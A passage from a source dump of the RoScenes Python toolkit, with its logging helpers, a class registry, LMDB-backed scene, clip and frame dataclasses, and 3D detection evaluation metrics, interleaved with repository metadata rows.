disable logging. """ def __init__(self, logger: logging.Logger, disable: bool): self._logger = logger self._disable = disable self._previous_status = False def __enter__(self): if self._disable: self._previous_status = self._logger.disabled self._logger.disabled = True def __exit__(self, exc_type, exc_val, exc_tb): if self._disable: self._logger.disabled = self._previous_status class KeywordRichHandler(rich.logging.RichHandler): KEYWORDS: ClassVar[Optional[list[str]]] = [ r"(?P<green>\b([gG]ood|[bB]etter|[bB]est|[sS]uccess(|ful|fully))\b)", r"(?P<magenta>\b([bB]ase|[cC]all(|s|ed|ing)|[Mm]ount(|s|ed|ing))\b)", r"(?P<cyan>\b([mM]aster|nccl|NCCL|[mM]ain|···|[tT]otal|[tT]rain(|s|ed|ing)|[vV]alidate(|s|d)|[vV]alidat(|ing|ion)|[tT]est(|s|ed|ing))\b)", r"(?P<yellow>\b([lL]atest|[lL]ast|[sS]tart(|s|ed|ing)|[bB]egin(|s|ning)|[bB]egun|[cC]reate(|s|d|ing)|[gG]et(|s|ting)|[gG]ot|)\b)", r"(?P<red>\b([eE]nd(|s|ed|ing)|[fF]inish(|es|ed|ing)|[kK]ill(|s|ed|ing)|[iI]terrupt(|s|ed|ting)|[qQ]uit|QUIT|[eE]xit|EXIT|[bB]ad|[wW]orse|[sS]low(|er))\b)", r"(?P<italic>\b([aA]ll|[aA]ny|[nN]one)\b)" ] def render_message(self, record: logging.LogRecord, message: str) -> ConsoleRenderable: use_markup = getattr(record, "markup", self.markup) message_text = Text.from_markup(message) if use_markup else Text(message) highlighter = getattr(record, "highlighter", self.highlighter) if self.KEYWORDS: for keyword in self.KEYWORDS: message_text.highlight_regex(keyword) # message_text.highlight_words(value, key, case_sensitive=False) if highlighter: message_text = highlighter(message_text) return message_text def configLogging(level: str | int = logging.INFO) -> logging.Logger: logging_config = { "version": 1, "formatters": { "full": { "format": r"%(asctime)s - %(name)s - %(levelname)s - %(message)s" } }, "handlers": { "console": { "class": "roscenes.misc.KeywordRichHandler", "level": level, "rich_tracebacks": True, "tracebacks_show_locals": False, "log_time_format": r"%m/%d %H:%M", "markup": False, "enable_link_path": False } }, "loggers": { 'roscenes': { "propagate": True, "level": level, "handlers": [ "console" ] } } } logging.config.dictConfig(logging_config) return logging.getLogger('roscenes') def _alignYAML(str, pad=0, aligned_colons=False): props = re.findall(r'^\s*[\S]+:', str, re.MULTILINE) if not props: return str longest = max([len(i) for i in props]) + pad if aligned_colons: return ''.join([i+'\n' for i in map( lambda str: re.sub(r'^(\s*.+?[^:#]): \s*(.*)', lambda m: m.group(1) + ''.ljust(longest-len(m.group(1))-1-pad) + ':'.ljust(pad+1) + m.group(2), str, re.MULTILINE), str.split('\n'))]) else: return ''.join([i+'\n' for i in map( lambda str: re.sub(r'^(\s*.+?[^:#]: )\s*(.*)', lambda m: m.group(1) + ''.ljust(longest-len(m.group(1))+1) + m.group(2), str, re.MULTILINE), str.split('\n'))]) def pPrint(d: dict) -> str: """Print dict prettier. Args: d (dict): The input dict. Returns: str: Resulting string. """ with StringIO() as stream: yaml.safe_dump(d, stream, default_flow_style=False) return _alignYAML(stream.getvalue(), pad=1, aligned_colons=True) class Registry(Generic[T]): """A registry. Inherit from it to create a lots of factories. Example: ```python # Inherit to make a factory. class Geometry(Registry): ... # Register with auto-key "Foo" @Geometry.register class Foo: ... # Register with manual-key "Bar" @Geometry.register("Bar") class Bar: ... instance = Geometry.get("Foo")() assert isinstance(instance, Foo) instance = Geometry["Bar"]() assert isinstance(instance, Bar) ``` """ _map: Dict[str, T] def __init_subclass__(cls, **kwargs): super().__init_subclass__(**kwargs) cls._map: Dict[str, T] = dict() @classmethod def register(cls, key): """Decorator for register anything into registry. Args: key (str): The key for registering an object. """ if isinstance(key, str): def insert(value): cls._map[key] = value return value return insert else: cls._map[key.__name__] = key return key @classmethod def get(cls, key: str, logger = logger) -> T: """Get an object from registry. Args: key (str): The key for the registered object. """ result = cls._map.get(key) if result is None: raise KeyError(f"No entry for {cls.__name__}. Avaliable entries are: {os.linesep + cls.summary()}.") elif isinstance(result, functools.partial): logger.debug("Get <%s.%s> from \"%s\".", result.func.__module__, result.func.__qualname__, cls.__name__) else: logger.debug("Get <%s.%s> from \"%s\".", result.__module__, result.__qualname__, cls.__name__) return result @classmethod def values(cls): """Get all registered objects.""" return cls._map.values() @classmethod def keys(cls): """Get all registered keys.""" return cls._map.keys() @classmethod def items(cls): """Get all registered key-value pairs.""" return cls._map.items() @classmethod def summary(cls) -> str: """Get registry summary. """ return pPrint({ k: v.__module__ + "." + v.__name__ for k, v in cls._map.items() }) @contextlib.contextmanager def progressedJoblib(progress: Progress, desc: str, total: int): """Context manager to patch joblib to report progress bar update.""" if not progress.live.is_started: raise RuntimeError('You must pass a live progress. This context manager does not handle progress lifecycle.') task = progress.add_task(desc, total=total) class _batchCompletionCallback(joblib.parallel.BatchCompletionCallBack): def __call__(self, *args, **kwargs): progress.update(task, advance=self.batch_size) return super().__call__(*args, **kwargs) old_batch_callback = joblib.parallel.BatchCompletionCallBack joblib.parallel.BatchCompletionCallBack = _batchCompletionCallback try: yield finally: joblib.parallel.BatchCompletionCallBack = old_batch_callback progress.remove_task(task)
13,299
Python
.py
354
29.087571
164
0.569819
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,422
typing.py
roscenes_RoScenes/roscenes/typing.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. from typing import Union, Iterable from pathlib import Path StrPath = Union[str, Path] Indexing = Union[int, Iterable[int], slice]
851
Python
.py
19
43.789474
75
0.747596
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,423
clip.py
roscenes_RoScenes/roscenes/data/clip.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. from __future__ import annotations import os import pickle from io import BytesIO from typing import OrderedDict, TYPE_CHECKING from dataclasses import dataclass, field from functools import wraps import lmdb import numpy as np import numpy.typing as npt from roscenes.data.camera import Camera from roscenes.data.frame import Frame from roscenes.typing import Indexing if TYPE_CHECKING: from roscenes.data.scene import Scene # For lmdb environment lazy loading def _lazyLoadLMDB(func): @wraps(func) def _decorator(self: Clip, *args, **kwargs): if self._env is None: # 512MiB is enough for a clip. # disable readahead to enhance random read performance. # disable lock since we use in a read-only scenario. self._env = lmdb.Environment(os.path.join(self.parent.rootDir, "database", self.token), map_size=1024*1024*512, readonly=True, readahead=False, lock=False) # enable buffer to enhance performance self._txn = self._env.begin(buffers=True) return func(self, *args, **kwargs) return _decorator @dataclass class Clip: """A sequence of captured images and annotations.""" cameras: OrderedDict[str, Camera] """Key is camera token, value is a single Camera.""" startTimeStamp: int """The 13-digit Unix timestamp represents start frame.""" endTimeStamp: int """The 13-digit Unix timestamp represents end frame.""" sequence: list[str] """All frame's token from start to end.""" bound: npt.NDArray[np.float64] """The `[6]` cuboid that covers all 3D annotations. Ordered by `[xmin, ymin, zmin, xmax, ymax, zmax]`.""" token: str """The unique identifier of clip.""" parent: Scene = field(init=False) """The ancestor.""" # these private attributes are used for lmdb _env: lmdb.Environment = None _txn: lmdb.Transaction = None def _postInitialize(self): # update camera's parent for cam in self.cameras.values(): cam.parent = self def _tryClose(self): if self._env is not None: if self._txn is not None: del self._txn self._env.close() del self._env self._env = None self._txn = None # def projection(self, corners3d: np.ndarray, W=1920, H=1080) -> list[tuple[np.ndarray, np.ndarray]]: # """Project unnormalized 3d points to images in each camera. # Args: # corners3d (`NDArray[float64]`): `[..., 8, 3]` array of unnormalized 3D corner boxes. # Returns: # `list[tuple[NDArray[float64], NDArray[bool]]]`: Length == cameras. each is a (`[..., 8, 3]`, `[...]`): projected corners boxes with depths and visibilities. # """ # results = list() # # [N, 8, 3] -> [N, 8, 4], [x, y, z, 1] # corners3d = np.concatenate([corners3d, np.ones([corners3d.shape[0], corners3d.shape[1], 1], dtype=corners3d.dtype)], -1) # for cam in self.cameras.values(): # boxUnderImage = corners3d @ cam.world2image.T # # [N, 8, 3] # boxUnderImage = boxUnderImage[..., :3] # # scale # # [N, 8, 3] # boxUnderImage[..., :2] /= (boxUnderImage[..., 2:] + 1e-6) # # [N, 8] # reasonable = (boxUnderImage[..., 0] < W) * (boxUnderImage[..., 0] > 0) * (boxUnderImage[..., 1] > 0) * (boxUnderImage[..., 1] < H) # # check any point is in image, [N] # reasonable = reasonable.sum(-1).astype(bool) # # in front of camera and in image area [N] # inImage = (boxUnderImage.mean(-2)[..., 2] > 0) * reasonable # results.append((boxUnderImage, inImage)) # return results # ignore lmdb objects when pickling def __getstate__(self): d = dict(self.__dict__) d.pop('_env', None) d.pop('_txn', None) return d def __setstate__(self, d): self.__dict__.update(d) def __del__(self): if self._env is not None: if self._txn is not None: del self._txn self._env.close() self._env = None self._txn = None @_lazyLoadLMDB def __iter__(self): for v in self.sequence: buffer = self._txn.get(v.encode()) if buffer is None: raise KeyError(v) frame: Frame = pickle.load(BytesIO(buffer)) frame.parent = self yield frame @_lazyLoadLMDB def __getitem__(self, idx: Indexing) -> Frame: viewTokens = self.sequence[idx] # A single frame if isinstance(viewTokens, str): buffer = self._txn.get(viewTokens.encode()) if buffer is None: raise KeyError(viewTokens) frame: Frame = pickle.load(BytesIO(buffer)) frame.parent = self return frame result = list() for viewToken in viewTokens: buffer = self._txn.get(viewToken.encode()) if buffer is None: raise KeyError(viewToken) frame: Frame = pickle.load(BytesIO(buffer)) frame.parent = self result.append(frame) return result # def getByTimeStamp(self, timeStamp: int): # allTimeStamps = np.array([v.timeStamp for v in self]) # delta = np.abs(timeStamp - allTimeStamps) # nearest = np.argmin(delta) # return self[nearest] def __len__(self): return len(self.sequence)
6,288
Python
.py
151
34.860927
170
0.6096
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,424
camera.py
roscenes_RoScenes/roscenes/data/camera.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. from __future__ import annotations from typing import TYPE_CHECKING from dataclasses import dataclass, field import numpy as np import numpy.typing as npt if TYPE_CHECKING: from roscenes.data.clip import Clip @dataclass class Camera: """A camera in the clip.""" name: str """The 5-char camera name.""" extrinsic: npt.NDArray[np.float64] """The `[4, 4]` camera extrinsic transforms World coord to Camera coord. `extrinsic @ (X, Y, Z, 1) = (x, y, z, _)`.""" intrinsic: npt.NDArray[np.float64] """The `[4, 4]` camera intrinsic transforms Camera coord to Image coord. `intrinsic @ (x, y, z, 1) = (u0, v0, d, _)`. Then `(u, v) = (u0, v0) / d`.""" # depthRange: npt.NDArray[np.float64] # """The camera depth in shape `[2]`, ordered by `[near, far]`.""" @property def world2image(self) -> npt.NDArray[np.float64]: return (self.intrinsic @ self.extrinsic).copy() # parent clip parent: Clip = field(init=False) # The unique identifier token: str """The unique identifier of camera.""" # @property # def focal(self) -> tuple[float, float]: # return float(self.intrinsic[0, 0]), float(self.intrinsic[1, 1])
1,918
Python
.py
44
40.363636
154
0.685086
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,425
metadata.py
roscenes_RoScenes/roscenes/data/metadata.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. from dataclasses import dataclass from datetime import datetime from enum import Enum class _Enum(Enum): def __str__(self): return self.name class Difficulty(_Enum): unknown = 0 easy = 1 hard = 2 mixed = 3 class Ambience(_Enum): unknown = 0 day = 1 night = 2 mixed = 3 class Weather(_Enum): unknown = 0 clear = 1 dirty = 2 mixed = 3 class Split(_Enum): unknown = 0 train = 1 validation = 2 test = 3 @dataclass class Metadata: difficulty: Difficulty ambience: Ambience # weather: Weather split: Split creation: datetime additional: str
1,361
Python
.py
49
24.612245
75
0.699081
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,426
__init__.py
roscenes_RoScenes/roscenes/data/__init__.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. # from .camera import Camera from .clip import Clip from .frame import Frame from .scene import Scene, ConcatScene from .metadata import Metadata __all__ = [ 'Camera', 'Clip', 'Frame', 'Scene', 'ConcatScene', 'Metadata' ]
968
Python
.py
29
31.482759
75
0.72572
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,427
frame.py
roscenes_RoScenes/roscenes/data/frame.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. from __future__ import annotations import os from pathlib import Path from typing import OrderedDict, TYPE_CHECKING from dataclasses import dataclass, field import numpy as np import numpy.typing as npt if TYPE_CHECKING: from roscenes.data.clip import Clip @dataclass class Frame: """All captured images by cameras at specific timestamp, in a clip.""" timeStamp: int """The Unix timestamp, 13-digit.""" imagePaths: OrderedDict[str, Path] """Key is camera token, value is image path (this is path relative to root directory, use `Frame.images` instead to get path joint with root directory).""" index: int """The absolute index in the clip sequence.""" parent: Clip = field(init=False) @property def previous(self) -> Frame | None: raise NotImplementedError @property def next(self) -> Frame | None: raise NotImplementedError boxes3D: npt.NDArray[np.float64] """`[N, 3+3+4]`. All 3d boxes, each column is `X, Y, Z, w, l, h, q1, q2, q3, q4`. Coordinate system is: ``` up Y X front rotated from BEV: ^ ^ (yaw=0) ^ Y | / | (yaw=0.5*pi) | / | X left Z <------ 0 Z .------> 1 -front-- 0 /| /| 2 --back-- 3 h | | | | . 5 -------. 4 |/ |l 6 ---w---- 7 ``` The quaternion rotates the standard basis to the box basis, which is box-centered, X points to front, Y points to left, Z points to top. """ velocities: npt.NDArray[np.float64] """`[N, 2]`. `[vx, vy]` of each box in m/s. `vz` is ignored.""" labels: npt.NDArray[np.int64] """`[N]`. Integer label of each box. Check `consts.labels` for details.""" instancesIDs: npt.NDArray[np.int64] """`[N]`. Integer tracking ID of each box. This value is unique across clip sequence.""" visibleBoundingBoxes: OrderedDict[str, npt.NDArray[np.float64]] """Key is camera token, value is `[num_visible, 4]` array. Each row is a `[xmin, ymin, xmax, ymax]` 2d bounding box of a visible object in image coordinates under this camera. Visible object ID see `Frame.visibleInstanceIDs`.""" visibleProjected3DBoxes: OrderedDict[str, npt.NDArray[np.float64]] """Key is camera token, value is `[num_visible, 8, 3]` array. Each row is 8 3d corners representing a 3D box of a visible object in camera coordinates under this camera. Visible object ID see `Frame.visibleInstanceIDs`.""" visibleObjectOcclusions: OrderedDict[str, npt.NDArray[np.float64]] """Key is camera token, value is `[num_visible]` array. Each row is occlusion rate (0~1) of a visible object under this camera. Visible object ID see `Frame.visibleInstanceIDs`.""" visibleInstanceIDs: OrderedDict[str, npt.NDArray[np.int64]] """Key is camera token, value is `[num_visible]` array. Each row is tracking ID of visible object under this camera.""" visibleLabels: OrderedDict[str, npt.NDArray[np.int64]] """Key is camera token, value is `[num_visible]` array. Each row is label of visible object under this camera. Visible object ID see `Frame.visibleInstanceIDs`.""" # behindStillObject: OrderedDict[str, npt.NDArray[np.bool_]] # """Key is camera token, value is `[num_visible]` array. Each row is indicator of visible object behinds still objects under this camera. Visible object ID see `Frame.visibleInstanceIDs`.""" # The unique identifier token: str """The unique identifier of frame.""" @property def images(self) -> OrderedDict[str, str]: """The image path with root dir joined. Returns: OrderedDict[str, str]: Key is camera token, value is joined image paths. """ return OrderedDict((key, os.path.join(self.parent.parent.rootDir, "images", value)) for key, value in self.imagePaths.items()) @property def extrinsics(self) -> OrderedDict[str, np.ndarray]: """All cameras' extrinsic. Returns: OrderedDict[str, np.ndarray]: Key is camera token, value is extrinsic. `extrinsic @ (X, Y, Z, 1) = (x, y, z, _)`. """ return OrderedDict((key, value.extrinsic.copy()) for key, value in self.parent.cameras.items()) @property def intrinsics(self) -> OrderedDict[str, np.ndarray]: """All cameras' intrinsic. Returns: OrderedDict[str, np.ndarray]: Key is camera token, value is intrinsic. `intrinsic @ (x, y, z, 1) = (u0, v0, d, _)`. Then `(u, v) = (u0, v0) / d`. """ return OrderedDict((key, value.intrinsic.copy()) for key, value in self.parent.cameras.items()) @property def world2images(self) -> OrderedDict[str, np.ndarray]: """All cameras' world to image transforms. Returns: OrderedDict[str, np.ndarray]: Key is camera token, value is transform matrix from world coords to image coords [4, 4]. """ return OrderedDict((key, value.world2image.copy()) for key, value in self.parent.cameras.items()) @property def instanceOcc(self) -> np.ndarray: # [N, num_cams], 0 -> not occluded, 1 -> totally occluded, -1 -> not visible occs = np.full([len(self.instancesIDs), len(self.imagePaths)], -1.0) for i, (instanceIDThisView, occ) in enumerate(zip(self.visibleInstanceIDs.values(), self.visibleObjectOcclusions.values())): # [N, n] thisViewToGlobalIDMapping = self.instancesIDs[:, None] == instanceIDThisView # this row is all 0 -> not visible notvisibleIDs = thisViewToGlobalIDMapping.sum(-1) < 1 # [N, n] @ [n] -> [N], bool assign to int64 array becomes 1 occs[:, i] = thisViewToGlobalIDMapping @ occ # assign not visibles to -1 occs[:, i][notvisibleIDs] = -1 # num of visible cameras visibleCount = (occs >= 0).sum(-1) instanceOcc = occs.copy() instanceOcc[instanceOcc < 0] = 0 instanceOcc = instanceOcc.sum(-1) / visibleCount # all invisble is -1 instanceOcc[visibleCount < 1] = -1 # instance level occ, -1=invisible, 0=no occlusion, 1=total occlusion return instanceOcc
7,081
Python
.py
129
47.813953
232
0.640704
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,428
scene.py
roscenes_RoScenes/roscenes/data/scene.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. from __future__ import annotations import os import pickle import glob import logging import itertools from dataclasses import dataclass, field from typing import Iterable from pathlib import Path import numpy as np import numpy.typing as npt from roscenes.misc import configLogging from roscenes.data.metadata import Metadata from roscenes.data.clip import Clip from roscenes.data.frame import Frame from roscenes.consts import logger from roscenes.typing import StrPath, Indexing __all__ = [ "Scene", "ConcatScene" ] @dataclass class Scene: """The top wrapper for collection of clips""" name: str """The user-friendly name of this scene.""" metadata: Metadata """A brief top-level information of this scene.""" # used for frame image path generation. rootDir: Path """The path where this scene locates.""" clips: list[Clip] """All clips this scene has.""" # used for indexing, [N, 2], N = length of all frames, first is clipIdx, second is offset # see __getitem__ _indexing: npt.NDArray[np.int64] def __str__(self) -> str: return f'"{self.name}" ({self.metadata.split}): Ambience: `{self.metadata.ambience}`, difficulty: `{self.metadata.difficulty}`, created at {self.metadata.creation.strftime("%Y-%m-%d %H:%M")}' def concat(self, another: Scene | Iterable[Scene] | ConcatScene) -> ConcatScene: """Concatenate this scene with another scene(s). Args: another (Scene | Iterable[Scene] | ConcatScene): A single scene or a bunch of scenes. Returns: ConcatScene: The concatenated scenes. """ if isinstance(another, Scene): return ConcatScene([self, another]) elif isinstance(another, ConcatScene): return ConcatScene(list(itertools.chain([self], another.scenes))) return ConcatScene(list(itertools.chain([self], another))) @staticmethod def load(rootDir: StrPath | Iterable[StrPath], disableLogging: bool = False) -> Scene | ConcatScene: """Load scene data by given path(s). Args: rootDir (StrPath | Iterable[StrPath]): A single path, or a bunch of paths. Each path can be a glob string to retrieve directories that contain scene data. disableLogging (bool, optional): Whether to disable logging to all returned scene(s). Defaults to False. Raises: ValueError: If the given rootDir is neither a dir path nor a valid glob. Returns: Scene | ConcatScene: A scene if a single path is given, or concatenated scenes if glob or paths are given. """ logger = configLogging(logging.ERROR if disableLogging else logging.INFO) if isinstance(rootDir, (str, Path)): # normal loading if os.path.isdir(rootDir): databasePath = os.path.join(rootDir, "database") with open(os.path.join(databasePath, "scene.pkl"), "rb") as fp: scene: Scene = pickle.load(fp) # update dynamic attributes scene.rootDir = rootDir scene.logger = logger for clip in scene.clips: clip.parent = scene clip._postInitialize() logger.info('Load %s, %s frames.', scene, len(scene)) return scene # try fetch glob list, then load from list elif len(glob.glob(str(rootDir))) > 0: rootDir = sorted(glob.glob(str(rootDir))) else: raise ValueError('The given rootDir is neither a dir path nor a valid glob.') # load from list of dirs scenes = list() for root in rootDir: scenes.append(Scene.load(root, disableLogging)) return ConcatScene(scenes) def __getitem__(self, idx: Indexing) -> Frame | list(Frame): indices = self._indexing[idx] # a single frame if len(indices.shape) < 2: clipIdx, offset = indices return self.clips[clipIdx][offset] # slice or iterable indexing returns list of frames result = list() for clipIdx, offset in indices: result.append(self.clips[clipIdx][offset]) return result def __iter__(self): for clip in self.clips: for v in clip: yield v def __len__(self): return len(self._indexing) def __del__(self): if not hasattr(self, "clips"): return for clip in self.clips: clip.parent = None del clip @dataclass class ConcatScene: scenes: list[Scene] # [N, 3], scene idx, clip idx, offset _indexing: np.ndarray = field(init=False) def concat(self, another: Scene | Iterable[Scene] | ConcatScene) -> ConcatScene: """Concatenate another scene(s) to itself. Args: another (Scene | Iterable[Scene] | ConcatScene): The given scene(s). Returns: ConcatScene: A new ConcatScene contains current data plus given new data. """ if isinstance(another, Scene): return ConcatScene(self.scenes + [another]) if isinstance(another, ConcatScene): return ConcatScene(self.scenes + another.scenes) return ConcatScene(list(itertools.chain(self.scenes, another))) def __post_init__(self): # [N, 2] indexing = np.concatenate([x._indexing for x in self.scenes], 0) # [N, 3] indexing = np.concatenate([np.concatenate([np.full([len(x), 1], i, dtype=np.int64) for i, x in enumerate(self.scenes)]), indexing], -1) self._indexing = indexing logger.info('ConcatScene created of total frames: %s.', len(self)) def __getitem__(self, idx: Indexing) -> Frame | list(Frame): # normal indexing if isinstance(idx, int): sceneIdx, clipIdx, offset = self._indexing[idx] return self.scenes[sceneIdx].clips[clipIdx][offset] # slice or iterable indexing returns list of frames indices = self._indexing[idx] result = list() for sceneIdx, clipIdx, offset in indices: result.append(self.scenes[sceneIdx][clipIdx][offset]) return result def __iter__(self): for scene in self.scenes: for v in scene: yield v def __len__(self): return len(self._indexing) def __del__(self): if not hasattr(self, "scenes"): return for scene in self.scenes: del scene
7,301
Python
.py
170
34.811765
199
0.6363
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,429
__init__.py
roscenes_RoScenes/roscenes/evaluation/__init__.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. import roscenes.evaluation.detection
756
Python
.py
16
46.3125
75
0.747638
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,430
result.py
roscenes_RoScenes/roscenes/evaluation/detection/result.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. import os from dataclasses import dataclass, field import numpy as np import numpy.typing as npt from dashtable import data2rst @dataclass class APResult: precision: npt.NDArray[np.float64] recall: npt.NDArray[np.float64] score: npt.NDArray[np.float64] @dataclass class TPResult: value: npt.NDArray[np.float64] score: npt.NDArray[np.float64] def __post_init__(self): self.value = np.cumsum(self.value) / (np.arange(len(self.value)) + 1) @dataclass class DetectionResult: """Result for a single frame.""" ap: APResult tps: list[TPResult] @staticmethod def nothing(tpLength): return DetectionResult(APResult(np.zeros([10]), np.zeros([10]), np.linspace(1.0, 0.0, 10)), [TPResult(np.ones([10]), np.linspace(1.0, 0.0, 10)) for _ in range(tpLength)]) @property def hasTP(self): return self.tps is not None and len(self.tps) > 0 @property def apWeight(self): return len(self.tps) @property def result(self): precision, recall, score = self.ap.precision.copy(), self.ap.recall.copy(), self.ap.score.copy() # check if self is nothing if sum(self.ap.recall) < 1e-6: # return zero if len(self.tps) < 1: return 0.0, None return 0.0, [1.0 for _ in range(len(self.tps))] # remap recall to [0, 1] 101 points. recallInterp = np.linspace(0, 1, 101) precisionInterp = np.interp(recallInterp, recall, precision, right=0) scoreInterp = np.interp(recallInterp, recall, score, right=0) # clip recall > 0.1, precision > 0.1 precisionInterp = precisionInterp[recallInterp > 0.1] precisionInterp -= 0.1 precisionInterp = np.clip(precisionInterp, 0.0, 1.0) ap = np.mean(precisionInterp) / (1.0 - 0.1) if len(self.tps) < 1: return ap, None tpResults = list() for tp in self.tps: value, score = tp.value.copy(), tp.score.copy() # make interpolation sequence to be ascending valueInterp = np.interp(scoreInterp[::-1], score[::-1], value[::-1])[::-1] # clip, recall > 0.1, score > 0 # this should be left True, right False recallMask = recallInterp > 0.1 # this should be right True, left False scoreMask = scoreInterp > 0 # add one more True to the right-most mask rightMost = min(len(scoreMask) - 1, np.argwhere(scoreMask)[-1][0] + 1) scoreMask[rightMost] = True valueInterp = valueInterp[recallMask * scoreMask] # NOTE: replcace nan tp result to one (max error). tpResults.append(np.nan_to_num(np.mean(valueInterp), nan=1., posinf=1., neginf=1.)) return ap, tpResults @dataclass class ThresholdDetectionResult: label: int results: dict[float, DetectionResult] isIgnored: bool = False apWeight: float = field(init=False) def __post_init__(self): if self.isIgnored: self.apWeight = np.nan return apWeights = [r.apWeight for r in self.results.values() if r.hasTP] if not np.allclose(apWeights, np.mean(apWeights)): raise RuntimeError self.apWeight = apWeights[0] def ap(self, threshold: float): if self.isIgnored: raise RuntimeError("Ignored `ThresholdDetectionResult` does not have value.") return self.results[threshold].result[0] def mAP(self): if self.isIgnored: raise RuntimeError("Ignored `ThresholdDetectionResult` does not have value.") return np.mean(list(x.result[0] for x in self.results.values())) def tps(self): if self.isIgnored: raise RuntimeError("Ignored `ThresholdDetectionResult` does not have value.") res = [x.result for x in self.results.values()] tps = [r[1] for r in res if r[1] is not None] tps = np.clip(np.mean(np.float64(tps), 0), 0, 1) return tps @property def result(self) -> tuple[float, np.ndarray]: if self.isIgnored: raise RuntimeError("Ignored `ThresholdDetectionResult` does not have value.") res = [x.result for x in self.results.values()] aps = [r[0] for r in res if r[0] is not None] tps = [r[1] for r in res if r[1] is not None] mAP = np.mean(aps) # [#num_tp] tps = np.mean(np.float64(tps), 0) return mAP, tps @staticmethod def ignored(label: int): return ThresholdDetectionResult(label, None, True) @dataclass class ClassWiseDetectionResult: values: dict[str, tuple[float, npt.NDArray[np.float64]]] apWeight: float raw: dict[str, ThresholdDetectionResult] tpNames: list[str] def __str__(self): table = list() header = list() header.append("Class") header.append("NDS") header.append("mAP") for tpName in self.tpNames: header.append("m" + tpName) table.append(header) # First table table.append(["All", f"{self.result:.4f}", f"{self.mAP:.4f}"] + 